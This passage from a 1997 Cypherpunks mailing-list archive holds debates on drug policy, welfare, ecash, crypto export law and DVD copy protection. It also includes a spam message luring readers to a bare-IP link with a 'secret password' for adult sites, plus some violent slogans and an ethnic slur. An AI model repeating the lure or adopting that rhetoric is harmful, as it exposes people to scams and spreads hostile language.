life, you own it, do what you have to. > Also, it being the druggie's fault or not, treating him as an outcast > is not going to solve the problem. It'll only make it worse. For him, > and for the rest of us. It may not solve _his/her_ problem, but it may also make a couple of younger kids think twice before shooting up. > What works much better is treating his addiction more like a disease. Assuming that they _want_ to get treated. > and a dime. Also the mortality rate under the junkies is very low, > although I suspect you don't see that as a good thing. If they hold down a job, pay their own way, I could care less, and don't mind a bit. I don't want to support them. > The 'drug problem' as it exists in most places in this world is the > result of the mindboggeling numbers of people living in tiny spaces. Crap. There are kids in small towns all across the USA doing Coke, Speed, Pot, and LSD. They aren't "escaping a painful reality", they are just fucking bored and looking for a little fun. Petro, Christopher C. snow at smoke.suba.com From alexlh at xs4all.nl Thu Aug 28 18:54:56 1997 From: alexlh at xs4all.nl (Alex Le Heux) Date: Fri, 29 Aug 1997 09:54:56 +0800 Subject: Welfare Solution #389 In-Reply-To: <3.0.3.32.19970826220410.007e1cd0@mail.xs4all.nl> Message-ID: <3.0.3.32.19970829034712.0079c260@mail.xs4all.nl> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 At 18:26 8/28/97 -0500, you wrote: >On Tue, 26 Aug 1997, Alex Le Heux wrote: >> I suppose you believe that a drug addict has no one to blame but >> himself, and that he should take _all_ of the blame. I don't. They >> certainly deserve some credit for the mess they're in, but not >> entirely. Bad luck has a lot to do with it as well. Just like getting >> blown off a cliff by the wind. You shouldn't have been there, you >> should have been strong enough not be blown off, etc.... > > No one chooses to have the wind blow. If a junkie can >demonstrate how he became hooked by force, or by accident (i.e. "someone >slipped something in my drink over and over"/medical usage leading to >addiction), then I will not blame them as much. I know what it is like to >kick an addiction, and I can just imagine how much worse Herion, Coke, and >Speed are, but hey, it's your life, you own it, do what you have to. > "Bad Luck" in this case means a bit more than simple thigs like "someone slipped me one at a party". Bad luck comes in many forms. Drugs aren't just a physical thing, they mess with your mind ass well. So among "someone slipped me one at a party" we should also count "I just got fired and my girlfriend broke up with me and everything just plain sucked for a while, and before I knew it I was addicted" >> Also, it being the druggie's fault or not, treating him as an outcast >> is not going to solve the problem. It'll only make it worse. For him, >> and for the rest of us. > > It may not solve _his/her_ problem, but it may also make a couple >of younger kids think twice before shooting up. > Well, I have news for you: It doesn't make them think twice. You only have to look around you to see the prove of that. >> What works much better is treating his addiction more like a disease. > > Assuming that they _want_ to get treated. > Most of them do not like the situation they're in. Try _really_ talking to some of them. The problem is that by the time they're outcasts from society, the only thing left in life that'll take away the pain (physical pain as well, from withdrawel) is the drug. Make these people feel part of society again, and they suddenly gain a lot of strength. Enough strength in many cases to enable them to give up the drugs or at least lower their consumption to a level where they can actually function again. >> and a dime. Also the mortality rate under the junkies is very low, >> although I suspect you don't see that as a good thing. > > If they hold down a job, pay their own way, I could care less, and >don't mind a bit. > > I don't want to support them. > I'm not asking you to support them. I'm only saying that it would be that much nicer if we could help them get back on their own two feet. >> The 'drug problem' as it exists in most places in this world is the >> result of the mindboggeling numbers of people living in tiny spaces. > > Crap. There are kids in small towns all across the USA doing Coke, >Speed, Pot, and LSD. They aren't "escaping a painful reality", they are >just fucking bored and looking for a little fun. They're not the drug addicts I talking about here. They're just, like you say, "kids looking for a little fun" Alex -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQA/AwUBNAYcENuYAh4dUSo/EQJ47QCfdpQ4zQfu8XV3kqXNYW68LI/7r08AoOQd AcPexXHMQ/7hWn173VlWsJWj =Ifk6 -----END PGP SIGNATURE----- From feanor at nym.alias.net Thu Aug 28 19:09:31 1997 From: feanor at nym.alias.net (Feanor) Date: Fri, 29 Aug 1997 10:09:31 +0800 Subject: ncash? (was Re: pgp details) Message-ID: <19970829020009.7246.qmail@nym.alias.net> On Aug 26, 13:47, Mike wrote: } Subject: Re: ncash? (was Re: pgp details) > Lucky Green wrote: > >It doesn't provide payee anonymity, coins are neither divisible nor > transferable, why do you bother? > > Could it be... because Chaum won't license? That's not nescessary, actually. All you need is for the mint to put _no_ information at with the coin except it's serial number and a signatrue (possibly a timestamp as well). Voila, anonymity. I was thinking of implementing a low-cost server ofthis type, but there's the trust problem: this nym is relatively new... > Any ecash is better than none, and until Chaum's patent expire we > probably won't have an ecash system with all the bells and whistles. > Just consider that Mark Twain has been up for two years and they still > don't have a client that implements crash recovery (recover your money > if your disk crashes)! At last count they had all of 32 merchants signed > up. There might be other reasons for this: have you looked at their _fees_??? Holy crap! That's the only reason I don't have an account. They're charging top dollar for every aspect of a system that has it's only overhead in minimal amounts of CPU time. I was thinking of having my server charge only on deposit of real money and only a tiny amount (like 1-2%). I.e. no charge at all to open an account to recieve money... From frantz at netcom.com Thu Aug 28 19:50:11 1997 From: frantz at netcom.com (Bill Frantz) Date: Fri, 29 Aug 1997 10:50:11 +0800 Subject: gephardt slams crypto regs Message-ID: >At 06:16 PM 8/24/97 -0700, Vladimir Z. Nuri wrote: >>Encryption is vital to the Net >> BY RICHARD A. GEPHARDT > >Thanks for posting this! My hat's off to Senator Gephardt for >coming out in favor of economic and personal freedom! > >(Of course, it's not like I'd set my hat _down_ where he could >steal it or check its national origin label :-) Dick's still a >statist protectionist, but even if he's doing the right thing >just to annoy the right-wing statists like Clinton, it's a good start!) I also thank Vladimir for posting the article. I was going to post a summary, but I found myself buried under a kilomessage or so of back email after my trip to Switzerland. I think this article is principally interesting because Senator Gephardt is the Democratic leader in the House. It seems to indicate considerable disarray in the administration on what our crypto policy should be. As the ever optimist, this article, along with Dorothy Denning's new stand, and the Burnstein decision indicates that the forces of crypto repression are in retreat. GO TEAM! ------------------------------------------------------------------------- Bill Frantz | The Internet was designed | Periwinkle -- Consulting (408)356-8506 | to protect the free world | 16345 Englewood Ave. frantz at netcom.com | from hostile governments. | Los Gatos, CA 95032, USA From frissell at panix.com Thu Aug 28 20:05:50 1997 From: frissell at panix.com (frissell at panix.com) Date: Fri, 29 Aug 1997 11:05:50 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: <199708281809.LAA22962@f37.hotmail.com> Message-ID: <3.0.2.32.19970828225801.038810d4@panix.com> -----BEGIN PGP SIGNED MESSAGE----- At 03:45 PM 8/28/97 -0400, stonedog at ns1.net-gate.com wrote: >You might feel that the example that you responded to was a bit too >simplistically polemic, but I think for many people, especially those in >this forum, your hypothetical situation is not at all an ethical dilemma. Or as I said to people waiting in line to see "Schindler's List" as I was leaving the theater, "When you watch this film remember that this is what happens when the government has all the assault rifles and the people don't." DCF -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQCVAwUBNAY6t4VO4r4sgSPhAQGSdQP/aPhLU9X4t5I1al+5+rQ6VGJFr/x56ZCr 53c/ABCkCCHSR9OoBcOoSkWYHIO7MI80SEZDUAGtcpRPo53mgK8mVOKik6RQy3kO HadYqp0FkMq5wl7CDqvm2Pw79MZlKLplwwFZodq/NgT5BFbALx5fB6a+Dr9/GoQv 0uvENnhqb4E= =dN0J -----END PGP SIGNATURE----- From tank at xs4all.nl Fri Aug 29 12:14:11 1997 From: tank at xs4all.nl (tank) Date: Fri, 29 Aug 1997 12:14:11 -0700 (PDT) Subject: CPEH announcement/statement Message-ID: <199708291911.VAA17725@xs1.xs4all.nl> FOR IMMEDIATE RELEASE Contact: Congress for Peace in Euskal Herria (CPEH) cpeh at aol.com The Euskal Herria Journal (EHJ), an Internet publication reporting on the Basque struggle for self-determination and independence, is available temporarily at the following "mirror" sites: http://osis.ucsd.edu/ http://www.desaparecidos.org/ehj/ http://www.easynet.co.uk/cam/censorship/ehj http://samsara.law.cwru.edu/comp_law/ehj/ http://zthomas.digiweb.com http://www.contrast.org/mirrors/ehj/ The mirror sites support free speech without necessarily supporting the views and goals of the Euskal Herria Journal. On July 18, 1997, the Institute for Global Communications (IGC) suspended the EHJ web site for review. This occurred after IGC endured a virulent "e-mail bombing" attack promoted from Spain by political forces who opposed EHJ's reports on the Basque resistance movement and claimed IGC was hosting the Basque armed organization Euskadi Ta Askatasuna itself. The attack overwhelmed IGC's ability to keep their system running and threatened to temporarily end services to other clients. IGC is "reviewing whether EHJ membership in the `progressive pages directory' promoted by IGC is consistent with IGC's mission." In light of the controversy surrounding the Euskal Herria Journal web site we state the following: First, we believe that Euskadi Ta Askatasuna (ETA, Basque Homeland and Freedom) has a right to a web site just like the Zapatistas, the FARC-EP, the MRTA or any other resistance movement. However, EHJ is published by the Congress for Peace in Euskal Herria, an independent grassroots organization that promotes political negotiations and Basque self-determination. EHJ has historical information and documents about/from ETA but it would be presumptuous to speak for ETA. Second, we promote dialogue for a peaceful solution of the Basque conflict. And there cannot be real dialogue without including ETA, a principal antagonist in the conflict. Our campaign both in France and Spain includes seeking support for the restoration of key procedural rights and safeguards to comply with the international principles for the protection of people in detention or imprisonment in both countries, and the transfer of all Basque political prisoners to jails in the Basque Country--a first step to break the logjam conflict. Third, the intervention of the Spanish government--telling CNN to remove the links between its site and the Euskal Herria Journal--and the media that encouraged the "e-mail bombing," is a signal that EHJ is effective. Finally, we hope IGC restores the EHJ web site at the earliest possible date. We believe that no matter how threatening "e-mail bombing" was to IGC, the suspension of the EHJ web site gives into such attackers and endangers free speech. We appreciate IGC's difficulties but free speech does not come free. We remain committed to peace with JUSTICE and will continue--with or without a web site--to make known the struggle for civil and national rights in the Basque Country under French and Spanish rule and to get political negotiations started between the Spanish government and Euskadi Ta Askatasuna. Congress for Peace in Euskal Herria (CPEH) New York ENDS. From feanor at nym.alias.net Thu Aug 28 23:23:03 1997 From: feanor at nym.alias.net (Feanor) Date: Fri, 29 Aug 1997 14:23:03 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) Message-ID: <19970829031134.15422.qmail@nym.alias.net> On Aug 28, 9:59, Ian Sparkes wrote: } Subject: Re: Socio-Economic Cults (Re: Cypherpunk Cults) > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > At 14:43 28.08.97 +1000, you wrote: > >On Wed, 27 Aug 1997, Adam Back wrote: > > > >[...] > > > >> If one person becomes too much of a nuisance (real trigger happy > for > >> ultra minor infractions [...] relatives, friends, or concerned > citizens > >> will correct (fill trigger happy person with lead). > > > >Dosn't help the poor person who got shot dose it? Am I mad to > beleave > >that getting killed is a reduction of basic civil liberties? > > > >> That's how the wild west worked anyway... outlaws didn't last that > >> long. > > > >Nor did the wild west. > > > > And nor the innconent bystanders. The 'you pissed me off - bang bang > you're dead' mentality was the reason for one of the largest > genocides in human history. One assumes you are reffering to the wild west again? Regardless, a point about the wild west: I have it from a fairly reliable source that in teh entire time period labeled 'The Wild West', there were about 8 shooting deaths in Dodge City (a particularily 'Wild' town), of which 5 were shotgun deaths.... Makes you wonder. I also have a pointer to an excellent, well researched US paper on why gun control is bad, if anyone wants it, but it's been posted here before I'm pretty sure. From rah at shipwright.com Thu Aug 28 23:23:43 1997 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 29 Aug 1997 14:23:43 +0800 Subject: Aussies discover regulatory arbitrage... Message-ID: --- begin forwarded text >From today's Australian Financial Review. http://www.afr.com.au/content/970829/inform/inform1.html ATO urges no Internet slug _By Hans van Leeuwen_ The Australian Tax Office's attempt to tax electronic commerce should include no new taxes and as little extra red tape as possible, according to the recommendations of a major ATO report to be released today. The report, _Tax and the Internet_, urges close monitoring of some key industries with a growing Internet presence -- including computer software, news and information, recorded music, gambling, travel services and retail goods. But its emphasis is on creating a tax and regulatory environment that keeps the online industries in Australia, rather than driving them to more lenient tax jurisdictions. The report will be the basis for discussions with the information industry on how the ATO can prevent the undermining of the tax base by electronic commerce. The report said the ATO would need to tax and regulate the Internet only in concert with other countries if it was to encourage online businesses and industries in Australia. "As the Internet allows electronic payment system providers to locate their operations anywhere in the world, they might choose to flee a jurisdiction that unilaterally introduces a strong regulatory regime . . . Unilateral action may be more damaging than no action," the report said. But the tax base must be protected, with electronic commerce posing a significant threat in the longer term to the revenue base of many taxes. "There are not too many existing taxes worldwide that are not vulnerable," the Tax Commissioner, Mr Michael Carmody, said yesterday. The recommendations to strengthen the tax policing of the Internet included: * Numbers displayed on websites. * Licence commercial internet sites ("webshops") and webshop hosts. * Introduce denomination limits for electronic cash, like those already existing for physical cash. * Review the current wholesale sales tax categories, given that new products were being thrown up by the process of digitisation. But Mr Carmody ruled out introducing any taxes on data flows, such as a bit tax, in the short term. "We don't see major advantages to that at the moment. For Australia to jump immediately to a bit tax would just drive Australian business out of the country," he said. The report said electronic commerce threw up some tough challenges to tax administrations, including the difficulty in identifying the parties to an electronic transaction, the ability of cyber- businesses to store records offshore and encrypt them, and the removal of "middle men" -- such as wholesalers and brokers -- from the distribution process, who usually make the ATO's tracking of transactions easier. But Mr Carmody said the ATO would not be assuming that the reason businesses went online was to avoid tax. "It's just another medium of transacting business, which does not of itself say they're not going to meet their tax obligations," he said. "But there are concerns that the Internet opens up wider fields for those who are seeking to avoid their liabilities." _________________________________________________________________ [27]Back To Top _� This material is subject to copyright and any unauthorised use, copying or mirroring is prohibited._ --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From shamrock at netcom.com Thu Aug 28 23:28:00 1997 From: shamrock at netcom.com (Lucky Green) Date: Fri, 29 Aug 1997 14:28:00 +0800 Subject: Welfare Solution #389 In-Reply-To: Message-ID: <3.0.2.32.19970828231634.0075f234@netcom10.netcom.com> At 03:47 AM 8/29/97 +0200, Alex Le Heux wrote: >Most of them do not like the situation they're in. Try _really_ >talking to some of them. The problem is that by the time they're >outcasts from society, the only thing left in life that'll take away >the pain (physical pain as well, from withdrawel) is the drug. Make >these people feel part of society again, and they suddenly gain a lot >of strength. Enough strength in many cases to enable them to give up >the drugs or at least lower their consumption to a level where they >can actually function again. I must agree with Alex on this one. Why a person became addicted is irrelevant. They are addicted and the question for the rest of us must become "how can we minimize the impact their addiction has on us". It has been shown that people usually grow out of Heroin addiction after time. The non-black market cost of their addiction is probably less than a dollar per day. The cost they impose on society when having to support their habit through the black market is much higher. Even without involving government, it would be trivial to raise the funds from donations to keep all addicts supplied with their drugs until such time that they are capable to give up the drugs entirely. BTW, I just found out that William S. Burroughs died. No, he didn't grow out of it an remained an Heroin addict until his death of old age. He must have been well into his 80's. And he was no burden on society. The royalties from his works could have fed even the most severe addiction. His writings influenced me in a big way during my youth. [This may be off-topic, but if there is any list on which people might care about the death a revolutionary like Burroughs, it is Cypherpunks]. --Lucky Green PGP encrypted mail preferred. DES is dead! Please join in breaking RC5-56. http://rc5.distributed.net/ From shamrock at netcom.com Thu Aug 28 23:28:05 1997 From: shamrock at netcom.com (Lucky Green) Date: Fri, 29 Aug 1997 14:28:05 +0800 Subject: need confirmation of DVD/CSS crack in China ... In-Reply-To: Message-ID: <3.0.2.32.19970828224436.0075c17c@netcom10.netcom.com> At 07:30 AM 8/28/97 DST, Jenaer Mixmaster Anonserver wrote: > DVD encryption is described on the Web at: > > http://www.kipinet.com/tdb/tdb_oct96/feat_protection.html > > There's a very simple way to 'break' it - you just copy the entire disk. >Key-size is irrelevant. I fail to see how you can prevent copying an entire disk. If the controller can access the data, I can copy it. Unless of course it will be made illegal to sell DVD controllers that output the raw data stream. Come to think of it, that must be coming. --Lucky Green PGP encrypted mail preferred. DES is dead! Please join in breaking RC5-56. http://rc5.distributed.net/ From sam.perry at reuters.com Thu Aug 28 23:28:45 1997 From: sam.perry at reuters.com (Sam Perry) Date: Fri, 29 Aug 1997 14:28:45 +0800 Subject: Sit, Bubu. Sit! / Re: Stay issued; modified stay to follow Message-ID: Thank you for your e-mail message. Sam Perry (sam.perry at reuters.com) is on a sabbatical until late September. If this involves a pending news event before then, please contact my colleagues at kourosh.karimkhany at reuters.com and therese.poletti at reuters.com. In the Interim, I can be reached via e-mail at sam.perry at wynd.net. Thank you and all the best ------------------------------------------------------------------------ Any views expressed in this message are those of the individual sender, except where the sender specifically states them to be the views of Reuters Ltd. From tcmay at got.net Thu Aug 28 23:31:39 1997 From: tcmay at got.net (Tim May) Date: Fri, 29 Aug 1997 14:31:39 +0800 Subject: Shrinks as Narcs for the State In-Reply-To: <199708282114.RAA01023@www.video-collage.com> Message-ID: At 2:14 PM -0700 8/28/97, Sean Roach wrote: >Although I deleted it for space, you mentioned Doctors. A lot of people are >afraid to tell thier doctors everything that the doctors need to know to do >thier jobs because the patients are afraid that, as illegal as it may be, >the patients medical history may end up in the hands of insurers, employers, >prospective employers, and numerous other people who may want it but >shouldn't have it. > I know a psychologist/therapist who is very worried about this issue, as are his associates. His records are no longer his, as he must inform the insurance agencies who are paying for his services what the diagnosis of a patient is. And this diagnosis can be found by all sorts of snoops...there have even been a few cases where the records inadvertently were placed in directories where Web crawlers could find them. And with Blacknet sorts of offshore data bases, a CD-ROM or DVD containing many records can be bought and sold... Further, those who visit doctors and shrinks are at risk for other reasons. The State has decreed that they "narc out" (inform on) their patients. Cf. Tarasoff, for example, which requires a mental health care professional, counselor, or doctor to inform the State if a client makes certain kinds of threats. This threat may cause the client to be locked up for observation. (Many think this is as it should be. But why is this so? We don't require non-doctors and non-shrinks to report such threats. If Joe Cypherpunk tells me at a Cypherpunks meeting he thinks Janet Reno should be blown up on her September 7th visit to San Jose, I am under no obligation whatsoever to assist the police in verifying what his real intentions are, or of cooperating in any way. So why should a psychiatrist become a secret agent for the State? We live in a police state.) --Tim May There's something wrong when I'm a felon under an increasing number of laws. Only one response to the key grabbers is warranted: "Death to Tyrants!" ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From stewarts at ix.netcom.com Thu Aug 28 23:35:03 1997 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 29 Aug 1997 14:35:03 +0800 Subject: Welfare / Norplant In-Reply-To: <199708251623.JAA15070@toad.com> Message-ID: <3.0.2.32.19970828203213.02f5ada8@popd.ix.netcom.com> At 10:49 AM 8/25/97 -0700, Tim May wrote: >Possibly more palatable to the majority not already on welfare, but hardly >an incentive to a single mother contemplating the increase in her >AFDC/WIC/etc. benefits should she add to her brood. >At 5:33 AM -0700 8/25/97, Peter Trei wrote: >>Offer a 'birthday present' program, under which *any* As with many government programs, and many attempts to fix them, it's going for the wrong problem, and tieing in to a lot of emotional hidden agendas. The real problems are that we'd rather not keep paying money to people many of us disapprove of, and that doing so in the way that it's been done has failed badly, and created an underclass of more people that we disapprove of that are getting money, as well as an overclass of welfare bureaucrats who do a better job of evading disapproval, and the whole process tends to create lots of hostility, in no small part because not only is having to live on the dole demeaning, but lots of people (including the above-mentioned bureaucrats) want to make sure it's as demeaning as a modern liberal society will allow. The obvious approach to the problem of people on welfare getting more money if they have kids is not to refuse their right to have kids, it's to not give them more welfare money. Regardless of the consequences. (Private charity is a totally different case, none of the government's business, though the government has corrupted a lot of the big players like Catholic Charities and the Salvation Army into running welfare subcontracting with government money.) Maybe the way to implement it is to cap the monthly amount, maybe it's to cap the lifetime amount (so welfare mothers know that if they want more money this month based on having more kids, they'll get fewer years of support.) Milton Friedman's socialistic approach to the problem, the Negative Income Tax, is also a partial win. It proposes that the paternalistic welfare bureaucrats haven't done much good in reducing the number of people dependent on welfare, so fire them. Use the well-known evil bureaucracy, the IRS, and have it just give money back to people with sufficiently low incomes. Maybe you'll get more welfare recipients who aren't the "deserving poor", but so what; probably there will be fewer "welfare queens" multi-dipping, and maybe even there'll be more welfare mothers with (gasp) their husbands or boyfriends living with them, but you'll have also gotten rid of a class of parasitic bloodsuckers who've probably contributed substantially to the dependency of the poor, and saved enough money to make up for the extra undeserving poor. [ObCryptoPolicyContent] After we get rid of those bloodsucking bureaucrats, or maybe even before, we can make it harder for the IRS to stay in business as well, by moving much of the economy out of their reach into cash :-) And the off-the-books cash economy is not unfamiliar to the poor, either; maybe we can learn some tips from them....] # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list or news, please Cc: me on replies. Thanks.) From feanor at nym.alias.net Thu Aug 28 23:35:45 1997 From: feanor at nym.alias.net (Feanor) Date: Fri, 29 Aug 1997 14:35:45 +0800 Subject: Monkey Wrench into the works Message-ID: <19970829032821.9582.qmail@nym.alias.net> On Aug 27, 10:44, Robert Hettinga wrote: } Subject: Monkey Wrench into the works > > --- begin forwarded text > > > Reply-To: "Myron Lewis" > From: "Myron Lewis" > To: "Robert Hettinga" > Subject: Monkey Wrench into the works > Date: Tue, 26 Aug 1997 22:25:55 -0400 > MIME-Version: 1.0 > X-Priority: 3 > X-MSMail-Priority: Normal > X-MimeOle: Produced By Microsoft MimeOLE Engine V4.71.1008.3 > > We communicated today about the DCSB luncheon at the Harvard Club and I have > been looking at some of the e$pam traffic. I am somewhat amused because our > company is about to throw a monstrous perturbation into Public-Private Key > encryption. > > We invite you and everyone on the list (Please send this invitation out to > them as the info on how to do that didn't come through.) to visit the KeyGen > webpage, www.KeyGen.com and learn about Automatic Synchronized > KeyGeneration(TM). If you think you recognize it as something you have seen > before, you're close but wrong. > > We are obviously biased, but we feel strongly and so do many others, that > ASK will solve many of the security problems presently under discussion. In > time, it will probably sink Key Management and Certificate Authorities. It won't change dick all as long as it's got that nice (TM) beside it, which I assume means it's not source available or open to peer review. Please, no-one trust proprietary algs in the arena. Sorry, try again. From stewarts at ix.netcom.com Thu Aug 28 23:36:34 1997 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 29 Aug 1997 14:36:34 +0800 Subject: Mathematics > NSA + GCHQ In-Reply-To: <97Aug23.121248edt.32258@brickwall.ceddec.com> Message-ID: <3.0.2.32.19970827191352.02f513ec@popd.ix.netcom.com> At 10:07 AM 8/23/97 -0700, Lucky Green wrote: >Now imagine if the prize was $1,000,000 or $10M. That's real money to just >about every student out there. Every box at every university would be >working on it. Employees would install the cracker first and ask their >sysadmin later. If at all. Heh. Every box would be running more than one copy, unless you hacked the code to have some sort of lockfile that would let it take turns occasionally. (If you just lock the user out, they'll take the trouble to go "fix" the code....) Fortunately, crunchons are getting pretty cheap these days, though the challenge would still lead to government people saying "See, it took a million dollars and every university computer in the country and they still haven't cracked Skipjack" or whatever the target is, just as they've kept the "$10,000 and a supercomputer" figurefor RC4/40 going around. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list or news, please Cc: me on replies. Thanks.) From stewarts at ix.netcom.com Thu Aug 28 23:51:45 1997 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 29 Aug 1997 14:51:45 +0800 Subject: H/W v S/W encryption Constitutional challenge --The Next Generation In-Reply-To: <1.5.4.32.19970826140833.00860dd0@pop.pipeline.com> Message-ID: <3.0.2.32.19970828200538.02f513ec@popd.ix.netcom.com> At 03:50 PM 8/26/97 +0000, Attila T. Hun wrote: > IM[NSH]O, we need a test case that _differentiates_ between > hardware encryption engines and _software_for_encryption (not to be > confused with firmware). Patel rendered an important decision, but > she refrained from establishing national jurisdiction; our only hope > in this instance is further citations as to relevance. I disagree. We'd lose, and setting bad precedent is worse than none or weak precedents. The important conclusion Judge Patel drew was that source code is clearly speech (yay! and blatantly obvious, as well :-) The next obvious directions to go, after we win the appeal, are to solidify the judgement with more source code (and deal with the fact that they'll keep changing the regulations), especially if we can do a source code in an interpreted language like perl, and then maybe go after binary code as speech. We'll also need to do something about the Karn case, since the difference between source code on paper and source code on a floppy is obviously not a legitimate one. If you do hardware, they'll say "Hardware isn't speech, it's stuff, and exporting stuff is commerce, and we can regulate commerce and exports", and they'll be right constitutionally if not morally. Exporting the detailed plans for encryption hardware might be fun, especially if the hardware is very generic (say, a speech card for a Nintendoid with some crypto firmware for the Nintendoid's CPU, or a cellphone-modem with crypto pumpware.) About the only Real Hardware I can see having a chance is some sort of ASIC-based device like a pocket organizer or cashcard that does encryption as an incidental part of some other function, such as an authentication protocol. But if it's a cash card, the rules have been flexible enough to handle permits for banking-only devices, and you don't get an interesting Constitutional case about being wrongly denied an export permit when they give you a permit, or at least give out permits for functionally similar products. I suppose there'd be some hack value in exporting a smart-cellphone with downloadable firmware/javaware (e.g. for multiple language support) with all the right export permits, and then releasing the crypto code from replay or kremvax or www.hongkong.cn , and using it as precedent for your application for exporting the crypto-equipped version. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list or news, please Cc: me on replies. Thanks.) From rah at shipwright.com Fri Aug 29 00:03:55 1997 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 29 Aug 1997 15:03:55 +0800 Subject: America's Concentration Camps In-Reply-To: Message-ID: At 9:19 pm -0400 on 8/28/97, Tim May wrote: > Like the Jews in Europe, the Japs were just too fucking timid and > well-mannered. Actually, they were subjected to hundreds of years in which weapons were only permitted to be handled by a special warrior caste. Sound familiar? Which reminds me... Peter Cassidy's just starting a book called "Fortress America", which talks about where all the LEA money goes. You know, for useful stuff, like armored personnel carriers, and ARs, and body armor, and flammable teargas, and stun grenades, and black nomex balaclavas, and kevlar gloves. Oh, well, so much for those 100,000 cops Billary promised us. Maybe it's just as well? I mean what if we had 100,000 new cops all wanting *their* black nomex balacalvas and kevlar gloves too... A spook's gotta sell his toys somewhere, I suppose. It's a living, I guess. I just wish they'd find a more useful line of work. Like lawyering, or something... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From blancw at cnw.com Fri Aug 29 00:26:06 1997 From: blancw at cnw.com (Blanc) Date: Fri, 29 Aug 1997 15:26:06 +0800 Subject: Stewart Baker on Bernstein encryption decision (fwd) Message-ID: <3.0.32.19970828235448.0069db08@cnw.com> Declan McCullagh wrote: >I share part of the blame here; I forwarded Baker's message to >cypherpunks. Now, you shouldn't blame the messenger. >I should point out that Baker is an interesting fellow. Check out his >article on Japan's crypto export ctrls in last Oct? Wired. He currently >represents Netscape; he's one of two lawyers in DC who does. He's an interesting fellow, all right; it can't be denied that his current position is a rather opportunistic conversion from his previous attitude. Like Bill Frantz said, it "indicates that the forces of crypto repression are in retreat." What would be *really* interesting is to know the reasons, their own explanations, for this. I mean, they can't expect that no one will notice the change. .. Blanc From tcmay at got.net Fri Aug 29 00:51:09 1997 From: tcmay at got.net (Tim May) Date: Fri, 29 Aug 1997 15:51:09 +0800 Subject: need confirmation of DVD/CSS crack in China ... In-Reply-To: Message-ID: At 10:44 PM -0700 8/28/97, Lucky Green wrote: >At 07:30 AM 8/28/97 DST, Jenaer Mixmaster Anonserver wrote: >> DVD encryption is described on the Web at: >> >> http://www.kipinet.com/tdb/tdb_oct96/feat_protection.html >> >> There's a very simple way to 'break' it - you just copy the entire disk. >>Key-size is irrelevant. > >I fail to see how you can prevent copying an entire disk. If the controller >can access the data, I can copy it. Unless of course it will be made >illegal to sell DVD controllers that output the raw data stream. > >Come to think of it, that must be coming. The way it was done with DAT (Digital Audio Tape), the product similar to DVD in so many ways, was to restrict the availability of DAT recorders which could faithfully record the output of other DAT machines. The SCMS system, or "Serial Copy Management System," has been in all consumer-grade DAT machines. Pro-grade DAT machines have no SCMS, or SCMS-defeat switch. And there are various SCMS defeaters widely available. --Tim May There's something wrong when I'm a felon under an increasing number of laws. Only one response to the key grabbers is warranted: "Death to Tyrants!" ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From frankiejoney78 at aol.com Fri Aug 29 15:52:26 1997 From: frankiejoney78 at aol.com (frankiejoney78 at aol.com) Date: Fri, 29 Aug 1997 15:52:26 -0700 (PDT) Subject: Password for 1800 + sex sites Message-ID: <0000000000.AAA000@aol.com> CIICK HERE http://38.216.110.212 Protect Your Children From Viewing ADULT XXX Material and at the same time get UNLIMITED FREE ACCESS to over 1200 of the Hottest Adult Sites on the Web. Also get FREE UNLIMITED Live Video Sex and FREE XXX rated chat room access. Stop paying to get into Adult Sites. This secret password gets you into them for FREE!!! I posted all the info at the URL below. CIICK HERE http://38.216.110.212 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ;kljdflkjasflkjasdflkjasflkajsfl;aksjf;laksjf;alksjfal;skfjal;sfjasl;kfja;slfkja;slfkja;slfkja;lfkj From cypherpunks at toad.com Fri Aug 29 01:26:04 1997 From: cypherpunks at toad.com (Cypherpunks Mailing List) Date: Fri, 29 Aug 1997 16:26:04 +0800 Subject: Sit, Bubu. Sit! / Re: Stay issued; modified stay to follow Message-ID: <340684AE.3F63@toad.com> Cindy Cohn wrote: > > During a conference call with counsel today, Judge Patel issued a stay of > the 